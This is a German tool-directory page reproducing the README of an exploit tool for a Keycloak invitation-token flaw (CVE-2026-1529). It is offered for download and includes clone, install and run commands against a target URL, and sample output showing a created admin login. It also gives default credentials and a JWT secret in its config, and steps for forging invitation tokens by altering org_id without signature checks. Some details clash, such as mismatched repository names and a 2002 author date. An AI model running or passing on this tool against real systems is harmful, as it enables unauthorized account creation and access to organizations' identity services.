Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — Exploit-Tool für CVE-2026-1529, das eine unbefugte Organisationsregistrierung in Keycloak über JWT-Token-Manipulation demonstriert. Enthält Token-Generierung, -Manipulation und Benutzerregistrierung mit Berichtserstellung. | Kitploit
Tools/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungAPI-Sicherheit
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Exploit-Tool für CVE-2026-1529, das eine unbefugte Organisationsregistrierung in Keycloak über JWT-Token-Manipulation demonstriert. Enthält Token-Generierung, -Manipulation und Benutzerregistrierung mit Berichtserstellung.

Repository anzeigenWebseite
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1529 Keycloak Exploit-Tool

Keycloak: Nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens


Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken. Verwenden Sie es nur auf Systemen, für die Sie ausdrücklich die Erlaubnis zum Testen haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch. Die Autoren dieses Tools sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Erstellt von: f3ds cr3w est, 2002


Übersicht

CVE-2026-1529 ist eine kritische Schwachstelle in Keycloak, die eine nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens ermöglicht. Dieses Exploit-Tool demonstriert die Schwachstelle, indem es JWT-Tokens manipuliert, um Benutzer in nicht autorisierten Organisationen zu registrieren.

Technische Details

  • CVE-ID: CVE-2026-1529
  • Betroffene Software: Keycloak (org.keycloak.services.resources.organizations)
  • CVSS-Score: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Auswirkung: Nicht autorisierter Zugriff auf Organisationsressourcen

Beschreibung der Schwachstelle

Die Schwachstelle besteht im JWT-Token-Validierungsprozess für Organisationseinladungen. Angreifer können die Felder org_id und email in der JWT-Payload manipulieren, wodurch sie Benutzer ohne ordnungsgemäße Autorisierung in beliebigen Organisationen registrieren können.


Installation

Voraussetzungen

  • Python 3.7 oder höher
  • pip-Paketmanager

Einrichtung

  1. Klonen oder laden Sie das Exploit-Tool herunter:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installieren Sie die erforderlichen Abhängigkeiten:
root@kitploit:~
pip install -r requirements.txt
  1. Machen Sie das Exploit-Skript ausführbar:
root@kitploit:~
chmod +x keycloak-exploit.py

Verwendung

Grundlegende Verwendung

root@kitploit:~
# Standardverwendung mit Ziel-URL
python keycloak-exploit.py https://target-keycloak.com

# Hilfe anzeigen
python keycloak-exploit.py -h

# Version anzeigen
python keycloak-exploit.py -v

Erweiterte Verwendung

root@kitploit:~
# Benutzerdefiniertes Einladungstoken verwenden
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Benutzerdefinierte Organisations-ID verwenden
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Benutzerdefinierte Konfigurationsdatei verwenden
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Debug-Logging aktivieren
python keycloak-exploit.py -d https://target-keycloak.com

Befehlszeilenoptionen

OptionBeschreibungErforderlich
targetZiel-Keycloak-URL (IP oder Domain)Ja
-t, --tokenBenutzerdefiniertes EinladungstokenNein
-o, --org-idBenutzerdefinierte Organisations-IDNein
-c, --configPfad zur KonfigurationsdateiNein
-d, --debugDebug-Logging aktivierenNein
-v, --versionVersionsinformationen anzeigenNein
-h, --helpHilfemeldung anzeigenNein

Ausgabe

Erfolgreicher Exploit

Wenn der Exploit erfolgreich ist, sehen Sie eine Ausgabe wie:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Fehlgeschlagener Exploit

Wenn der Exploit fehlschlägt, sehen Sie:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Projektstruktur

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Konfiguration

Standardkonfiguration

Das Tool verwendet eine Standardkonfigurationsdatei (config/default_config.json) mit den folgenden Einstellungen:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Benutzerdefinierte Konfiguration

Sie können eine benutzerdefinierte Konfigurationsdatei erstellen und diese mit der Option -c verwenden:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Technische Details

Exploit-Prozess

  1. Zielanalyse: Prüfen, ob das Ziel eine anfällige Keycloak-Instanz ist
  2. Token-Generierung: Generieren oder Verwenden eines benutzerdefinierten Einladungstokens
  3. Token-Manipulation: Manipulieren der JWT-Payload, um die Organisations-ID zu ändern
  4. Benutzerregistrierung: Registrieren eines Benutzers mit dem manipulierten Token
  5. Login-Test: Überprüfen, ob sich der erstellte Benutzer anmelden kann
  6. Berichtserstellung: Erstellen eines detaillierten Exploit-Berichts

JWT-Manipulation

Das Tool nutzt die unsachgemäße JWT-Validierung aus, indem es:

  1. Das JWT-Token ohne Signaturprüfung dekodiert
  2. Das Feld org_id ändert, um eine andere Organisation anzuvisieren
  3. Das Feld email bei Bedarf ändert
  4. Das Token mit der manipulierten Payload neu kodiert

Sicherheitsüberlegungen

  • Das Tool verwendet ordnungsgemäße Fehlerbehandlung und Protokollierung
  • Alle Netzwerkanfragen enthalten geeignete Header
  • Eingabevalidierung wird für alle Benutzereingaben durchgeführt
  • Das Tool respektiert die Serverantwortcodes des Ziels

Fehlerbehebung

Häufige Probleme

  1. Verbindungsfehler

    • Prüfen, ob die Ziel-URL erreichbar ist
    • Verifizieren, dass das Ziel eine Keycloak-Instanz ist
    • Netzwerkkonnektivität und Firewall-Einstellungen prüfen
  2. Token-Validierungsfehler

    • Sicherstellen, dass das Token-Format korrekt ist
    • Prüfen, ob das Token die erforderlichen Felder enthält (org_id, email, invitation_type)
    • Verifizieren, dass das Token nicht abgelaufen ist
  3. Registrierungsfehler

    • Prüfen, ob der Registrierungsendpunkt erreichbar ist
    • Das Format des manipulierten Tokens verifizieren
    • Prüfen, ob das Ziel die Organisationsregistrierung aktiviert hat

Debug-Modus

Aktivieren Sie das Debug-Logging für eine detaillierte Fehlerbehebung:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

Log-Dateien

  • Hauptprotokoll: logs/exploit.log
  • Berichte: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Testmethodik

Schwachstellenbewertung

Das Tool führt die folgenden Prüfungen durch:

  1. Health-Check: Verifiziert, dass das Ziel eine Keycloak-Instanz ist
  2. Versionserkennung: Versucht, die Keycloak-Version zu erkennen
  3. Endpunkttests: Testet organisationsbezogene Endpunkte
  4. Token-Validierung: Validiert die JWT-Token-Struktur

Exploit-Validierung

Der Exploit gilt als erfolgreich, wenn:

  1. Das Ziel anfällig ist
  2. Ein Benutzer mit dem manipulierten Token registriert werden kann
  3. Der registrierte Benutzer sich erfolgreich anmelden kann
  4. Ein gültiger Login-Link generiert wird

Sicherheits-Best Practices

Für Organisationen

  1. Patches anwenden: Auf die neueste Keycloak-Version aktualisieren
  2. Token-Validierung: Ordnungsgemäße JWT-Signaturprüfung implementieren
  3. Zugriffskontrolle: Organisationsregistrierung auf autorisierte Benutzer beschränken
  4. Überwachung: Auf verdächtige Registrierungsaktivitäten überwachen
  5. Netzwerksicherheit: Ordnungsgemäße Firewall-Regeln implementieren

Für Sicherheitsforscher

  1. Autorisierung: Nur Systeme testen, für die Sie die Erlaubnis zum Testen haben
  2. Verantwortungsvolle Offenlegung: Schwachstellen an Anbieter melden
  3. Dokumentation: Detaillierte Aufzeichnungen über Ihre Tests führen
  4. Ethisches Testen: Verantwortungsvolle Offenlegungspraktiken befolgen

Lizenz

Dieses Tool wird ausschließlich für Bildungs- und Sicherheitstestzwecke bereitgestellt. Verwendung auf eigenes Risiko.

Erstellt von: f3ds cr3w est, 2002

Kontakt: Bei Fragen oder Feedback wenden Sie sich bitte an das Projekt-Repository.


Änderungsprotokoll

Version 1.0

  • Erstveröffentlichung
  • Grundlegende Exploit-Funktionalität
  • JWT-Manipulationsfähigkeiten
  • Berichtserstellung
  • Befehlszeilenschnittstelle

🙏 Danksagungen

  • Keycloak-Entwicklungsteam
  • Sicherheitsforscher, die CVE-2026-1529 entdeckt haben
  • Die Open-Source-Sicherheitsgemeinschaft

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Verwenden Sie dieses Tool weise und ethisch.

by f3ds cr3w est, 2002

Tool herunterladen